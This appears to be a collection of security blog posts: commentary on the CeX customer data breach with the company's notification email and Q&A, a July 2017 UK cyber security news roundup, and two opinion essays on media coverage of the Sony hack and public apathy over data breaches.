CeX say "Our cyber security specialists have already put in place additional advanced measures to fix the problem and prevent this from happening again."; however, without any detail about the hack and the new measures put in place, this statement provides little assurance to CeX customers. The following statement also skirts what customers want to know: "additional measures were required to prevent such a sophisticated breach occurring and we have therefore employed a cyber security specialist to review our processes. Together we have implemented additional advanced measures of security to prevent this from happening". If this cyber attack turns out not to be sophisticated, CeX can expect heavy criticism from a more cyber entitled media, and interest from the Information Commissioner's Office for violating the Data Protection Act.

CeX Email
Dear Customer,
We are writing to inform you that unfortunately we have recently been subject to an online security breach. We are taking this extremely seriously and want to provide you with details of the situation and how it might affect you. We also want to reassure you that we are investigating this as a priority and are taking a number of measures to prevent this from happening again.
The situation
As a result of a breach of security in which an unauthorised third party accessed our computer systems, we believe that some customer data has been compromised. This includes personal information, and, for a small number of customers, it also includes encrypted data from expired credit or debit cards. As a customer of CeX, there is a possibility this might affect you.
Please note, we did not have any card data stored for your account. We ceased storing customer card details in 2009.
What we’ve done about it
This was a sophisticated breach of security and we are working closely with the relevant authorities to help establish who was responsible. Our cyber security specialists have already put in place additional advanced measures to fix the problem and prevent this from happening again.
What we suggest you do?
  • Although we have put in place additional security measures, we recommend that you change the password for your webuy online account.
  • If you used the same password elsewhere, we also suggest that you change your password for those accounts.
Further details on this issue are provided in a Q&A below. If you have additional questions, please email us at: guidance@webuy.com where we will be compiling the most frequently asked questions, which will then be updated via uk.webuy.com/guidance
We apologise for inconvenience this may cause.
Yours sincerely,
David Mullins
Managing Director


Questions & Answers
How much data has been compromised?
As a precautionary measure we are contacting up to two million of our registered website customers who could potentially be affected.
Does this affect in-store membership personal information?
We have no indication that in-store personal membership information has been compromised.
What does the data include?
The data includes some personal information such as first name, surname, addresses, email address and phone number if this was supplied. In a small number of instances, it may include encrypted data from expired credit and debit cards up to 2009. No further financial information has been shared.
What about financial data?
A small amount of encrypted data from expired credit and debit cards may have been compromised. We would like to make it clear that any payment card information that may have been taken, has long since expired as we stopped storing financial data in 2009.
What has happened to the data that has been compromised?
We are aware that an unauthorised third party has accessed this data. We are working closely with the relevant authorities, including the police, with their investigation.
What should I do?
We advise that you change your webuy.com password, as well as any other online accounts where you may share the same password, as a precautionary measure.
Why do I need to change my passwords?
Although your password has not been stored in plain text, if it is not particularly complex then it is possible that in time, a third party could still determine your original password and could attempt to use it across other, unrelated services. As such, as a precautionary measure, we advise customers to change their password across other services where they may have re-used their WeBuy website password.
Can customers find out exactly what data has been shared about them?
At this stage, it is not possible for us to share this information as we are still undergoing an investigation. At this stage, we are alerting all customers who might have been affected as a precaution.
What security do you have in place to protect this data?
We take the protection of customer data extremely seriously and have always had a robust security programme in place which we continually reviewed and updated to meet the latest online threats. Clearly however, additional measures were required to prevent such a sophisticated breach occurring and we have therefore employed a cyber security specialist to review our processes. Together we have implemented additional advanced measures of security to prevent this from happening again.

Cyber Security Roundup for July 2017

Apologies for the delay in this month's Cyber Security Roundup release, I've been away on holiday and taking a break from monitor screens and keyboards for a couple of weeks.

The insider threat danger manifested at Bupa where an employee stole and shared 108,000 customer health insurance records. Bupa dismissed the employee and is planning to take legal action. The Bupa data breach was reported both to the FCA and the ICO, it remains to be seen if the UK government bodies will apportion any blame onto Bupa for the data loss. 

The AA was heavily criticised after it attempted to downplay a data compromise of over 13 gigabytes of its data, which included 117,000 customer records. The AA’s huge data cache was incorrectly made available online after an AA online shop server was “misconfigured” to share confidential data backup files.

A customer data breach at World Wrestling Entertainment (WWE) should serve as a stark warning for businesses to adequately assure third parties and to secure hosted cloud systems. Three million WWE fan records were compromised after a third party misconfigured a cloud hosted Amazon server used by the WWE online shop.

The aftershock of Petya / NotPetya rumbles on, with malware still reported as disrupting firms weeks after the attack. There are claims the mass media coverage of the attack has improved overall staff cyber security awareness.

It was found that over 1.6 million NHS patient records were illegally provided to Google's artificial intelligence arm, DeepMind, without patient consent, meaning the NHS and Google have breached the Data Protection Act.

A 29 year old British hacker named as Daniel K, but better known by his hacker handle "BestBuy" or "Popopret", admitted to the hijacking of 900,000 Deutsche Telekom routers in Germany after he was arrested at Luton airport in February. He said he made "the worst mistake of my life" when he carried out a failed attack in November for a Liberian client who paid him 8,500 Euros to attack the Liberian's business competitors. BestBuy used a variant of the Mirai malware to take advantage of a security vulnerability in Zyxel and Speedport model routers used by the German Internet Service Provider, with the intention of growing his botnet, and so the scale of DDoS attacks he could perform on behalf of clients.

A document from the National Cyber Security Centre (NCSC) was obtained by Motherboard and was verified by the BBC with NCSC as being legitimate. The document, reportedly produced by the British spy agency GCHQ, states some industrial software companies in the UK are "likely to have been compromised" by hackers. The NCSC report discusses the threat to the energy and manufacturing sectors. It also cites connections from multiple UK internet addresses to systems associated with "advanced state-sponsored hostile threat actors" as evidence of hackers targeting energy and manufacturing organisations.

UniCredit Bank had over 400,000 customer loan accounts accessed through a third party. This is the second security breach at the Italian bank in a year.

Finally, this blog was named among the Best Technology Blogs of 2017 by Market Inspector and by Feedspot this month.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

When the Press Aids the Enemy

Let's start with this: freedom of the press is a critical part of any free society, and more importantly, a democratically governed society.

But that being said, I can't help but think there are times when the actions of the media aid the enemy. This is a touchy subject so I'll keep it concise and just make a few points that stick in my mind.

First, it's pretty hard to argue that the media doesn't look for ever-more sensational headlines, truth be damned, to get clicks and drive traffic to their publication. Whether it's digital or actual ink-on-paper, sensationalism sells; there's no arguing with that.

What troubles me is that, like in the war on terrorism, the enemy succeeds in their mission when the media creates hysteria and fear. This much should be clear. The media tend to feed into this pretty regularly and we see this in some of the most sensational headlines from stories that should be told in fact, not fantasy.


So when I came across this article on Buzzfeed called "The Messy Media Ethics Behind the Sony Hacks" it suddenly hit me - the media may very well be playing perfectly into the enemy's hands. The "Guardians of Peace" (GOP), in their quest to ruin Sony Pictures Entertainment, have stolen an unfathomable amount of information. As Steve Ragan, who has repeatedly written about this and many other breaches, tweeted, that's 200Gb or 287,000 documents. That's mind-blowing.

This cache of data has proven to be yet-unreleased movies, marketing presentations, email exchanges between executives and attorneys, financial plans, employees' medical records and so much more. The GOP have made it clear their aim is to "punish" Sony Pictures Entertainment - and while we don't really have an insight as to the true motivations here, I think it's clear that releasing all this data is meant to severely negatively impact the business.

What has followed in the days since the announcement of the hack is a never-ending stream of "news" articles that I struggle to understand. There were articles like this one providing commentary and analysis on internal marketing department presentations. There were articles analyzing the internal and privileged (as far as I know, but I'm not a lawyer) communications between corporate legal counsel and Sony Pictures executives. There were articles talking about the release of SPE employee medical records. The hit-parade goes on and on... and I'm not linking over to any more of the trash because it embarrasses me.

Clearly, clearly, the mainstream media (and hell even the not-so-mainstream) have long lost their ethics. Some would claim that it's the "freedom of the press" that allows them to re-publish and discuss sensitive, internal documents. Others argue that since it's already in the public domain (available on BitTorrent) then it's fair game. Note: This was discussed during the Snowden release - and it was clear that classified information released to the public domain does not suddenly lose its classified status. I'm fairly certain this easily applies to the not-national-security type of assets as well. To be honest, this argument makes me question the intellectual integrity of some of the people who make it.

Anyway, back to my point. If the GOP wanted to destroy Sony Pictures Entertainment then hacking in and releasing secret information and intellectual property was only half the battle. The second half, unfortunately, is being picked up and executed by the media, bloggers, and talking heads putting out "analysis" on all this data. Publishing links to the hacked data, analyzing its contents, and looking for further embarrassing and ugly things to publish: the media should be ashamed of itself.

The hack alone wasn't going to damage SPE's image to where it has fallen now - the media is clearly complicit in this and it's a shame. I'm not an attorney, so I question whether publishing and discussing confidential communications between an attorney and an executive is ethical. Forget that, is it even legal? Journalists and bloggers continue to hide behind the "freedom of the press", and some folks have even taken to blasting me for daring to question the absolute rights of the press. Except - the freedom of the press isn't absolute, as far as I know.

But whether it's legal, clearly there are ethical problems here. If you're in the media and you're poring over the confidential email communications stolen from Sony Pictures Entertainment systems, I emphasize stolen, and you're commenting on this - to what end? Arguing that the media is releasing this information because (a) it's already in the public domain and (b) it's "for the public good" is ludicrous.

Remember, while you're reveling in someone else's misery, that you too may be a coincidental victim one day. Then it'll be your turn to have your private information released and analyzed and attacked as part of the next breach. Your recourse? None... Glass houses, journalists. Glass houses.

The Other Side of Breach Hysteria

In a world where everyone is trying to sell you something, security is certainly no exception. But separating the hype from the truth can easily turn into a full time job if you're not careful.

With all the recent retail data breaches, it would appear as though the sky is falling in large chunks right on top of us. Every big-name retailer, and even some of the smaller ones, are being hacked and their precious card data is being whisked away to be sold to miscreants and criminals.

Now enter the sales and marketing pitches. After every breach it would seem our mailboxes fill up with subject lines such as:
"Learn how not to be the next , read how our latest gizmo will keep you secure!"
I don't know about you, but the snake-oil pitch is starting to get old. While it's clear that the average buyer is getting the message about data breaches and hackers - I believe there are two other aspects of this which aren't talked about enough.

First there is the notion of "breach fatigue". If you read the news headlines you would have thought that everyone's bank accounts would be empty by now, and everyone in the United States would have been the victim of identity theft by now. But they haven't. Or they haven't been impacted directly. This leads to the Chicken Little problem.

You see, many security professionals cried that security incidents did not receive enough attention. Then the media took notice, and sensationalized the heck out of incidents to an almost rock-star fervor. The issue here is that I believe people are starting to grow weary of the "Oh no! Hackers are going to steal everything I have!" talk. Every incident is the biggest there has ever been. Every incident is hackers pillaging and stealing countless credit card records and identities. The average person doesn't quite know what to make of this, so they have no choice but to mentally assume the worst. Then - over time - the worst never comes. Sure, some get impacted directly but there is this thing called zero fraud liability (in the case of card fraud) that means they are impacted - but barely enough to notice because their banks make it alright. More on this in a minute.

We as humans have a shocking ability to develop a tolerance to almost anything. Data breach hysteria is no exception. I've now seen and heard people around televisions (at airports, for example, where I happen to be rather frequently) say things like "Oh well, more hackers, I keep hearing about these hackers and it never seems to make a difference." Make no mistake, this is bad.

You see, the other side of the awareness hill, which we are rapidly approaching, is apathy. This is the kind of apathy that is difficult to recover from because we push through the first wave of apathy into awareness, and then hysteria, which leads to a much stronger version of apathy where we will be stuck - I believe. So there we are, stuck.

If I'm honest, I'm sick and tired of all the hype surrounding data breaches. They happen every day of every week, and yet we keep acting like we're shocked that Retailer X, or Company Y was breached. Why are we still even shocked? Many are starting to lose the ability to become shocked - even though the numbers of records breached and the scale of the intrusions are reaching absurd proportions.

The second point I'd like to make is around the notion of individual impact. Many people simply say that "this still doesn't impact me" because of a wonderful thing like zero fraud liability. Those 3 words have single-handedly destroyed the common person's ability to care about their credit card being stolen. After you've had your card cloned, or stolen online, and had charges show up - you panic. Once you realize your bank has been kind enough to put the funds back, or roll back the fraudulent charges, you realize you have a safety net. Now these horrible, terrible, catastrophic breaches aren't so horrible, terrible and catastrophic. Now they're the bank's problem.

Every time someone has a case of credit card fraud the bank covers under zero fraud liability (and let's face it, most cards and banks have this today) - their level of apathy for these mega-breaches grows. I believe this is true. I also believe there is little we can do about it. Actually, I'm not sure if there is anything that needs to be done about it. Maybe things are just the way they're going to be.

There is a great phrase someone once used that I'm going to paraphrase and borrow here - things are as bad as the free market will support. If I may adapt this to security - the security of your organization is as good (or bad) as your business and your customers will support.

Think about that.